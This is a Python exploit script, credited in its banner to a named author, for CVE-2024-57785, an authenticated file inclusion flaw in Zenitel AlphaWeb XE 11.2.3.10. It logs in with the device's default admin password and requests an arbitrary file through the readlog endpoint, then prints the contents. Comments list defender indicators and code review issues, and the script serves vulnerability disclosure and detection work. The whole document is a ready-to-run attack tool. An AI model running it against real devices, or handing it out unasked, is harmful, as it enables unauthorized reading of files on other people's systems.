import requests
import argparse
import base64
# Default account this script authenticates with (HTTP Basic, see main()).
# Defender note: the script only works as written while the device still
# accepts these defaults, so changing the admin password blocks it.
admin_user, admin_pw = "admin", "alphaadmin"

# Banner printed at start-up. It names the affected product and version and
# the CVE identifier, as stated by the script's author.
art = """
[*] Exploit Title: Authenticated File Inclusion Vulnerability on Zenitel AlphaWeb XE Version 11.2.3.10
[*] Date: 08/02/2025
[*] Exploit Author: Safvan Parakkal
[*] Vendor Website: https://www.zenitel.com/
[*] CVE: CVE-2024-57785
"""

# Runs at module level, so the banner is emitted on import as well as on
# direct execution.
print(art)
def get_args():
    """Parse the command line and return the parsed namespace.

    Both options are mandatory:
      -u / --url   stored as ``url``  (help text: "Target URL")
      -f / --file  stored as ``file`` (help text: "The file to read")

    No validation or normalisation is applied to either value here.
    """
    cli = argparse.ArgumentParser()
    option_table = (
        (("-u", "--url"), "Target URL"),
        (("-f", "--file"), "The file to read"),
    )
    for flags, description in option_table:
        cli.add_argument(*flags, required=True, action="store", help=description)
    return cli.parse_args()
def main():
    """Send one authenticated GET to the log-reading endpoint and print the reply.

    Reads ``url`` and ``file`` from get_args(), appends
    ``/php/amc_uploads.php?action=readlog&file=<file>`` to the URL, and sends
    the request with HTTP Basic credentials built from the module-level
    ``admin_user`` / ``admin_pw`` defaults. Returns None in every case.

    Defender notes (all visible in this function):
      * The request path and the ``action=readlog`` / ``file`` query
        parameters are what web or proxy logs would record for this script.
      * The User-Agent and PHPSESSID values are fixed strings, so they are
        static indicators for this exact script as published.
      * Authentication relies on the default account; a changed admin
        password makes the request fail as written.
    """
    cli = get_args()
    requested_file = cli.file
    target = f"{cli.url}/php/amc_uploads.php?action=readlog&file={requested_file}"

    # Basic auth token: base64("<user>:<password>") of the default account.
    credential_pair = f"{admin_user}:{admin_pw}".encode("ascii")
    basic_token = base64.b64encode(credential_pair).decode("ascii")

    request_headers = {
        "Authorization": f"Basic {basic_token}",
        "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.5.59 (like Safari/604.1)",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        # Hard-coded session identifier; it is sent unchanged on every run.
        "Cookie": "PHPSESSID=74db36a51834159c981252197d29a8fb",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "keep-alive",
    }

    try:
        # NOTE(review): no timeout is passed, so an unresponsive host can
        # block this call indefinitely.
        reply = requests.get(target, headers=request_headers)

        # NOTE(review): the body is printed before the status check, so it
        # is shown on failures too and appears twice on a 200 response.
        print(reply.text)

        if reply.status_code != 200:
            print("[-] Payload failed or file content not found.")
            return

        print(f"[*] Reading the file '{requested_file}'")
        print("======================================")
        print(reply.text)
        print("======================================")
    except requests.RequestException as err:
        print(f"[!] Request failed: {err}")
# Entry guard: the request is sent only when the file is executed directly,
# not when it is imported as a module.
if __name__ == "__main__":
    main()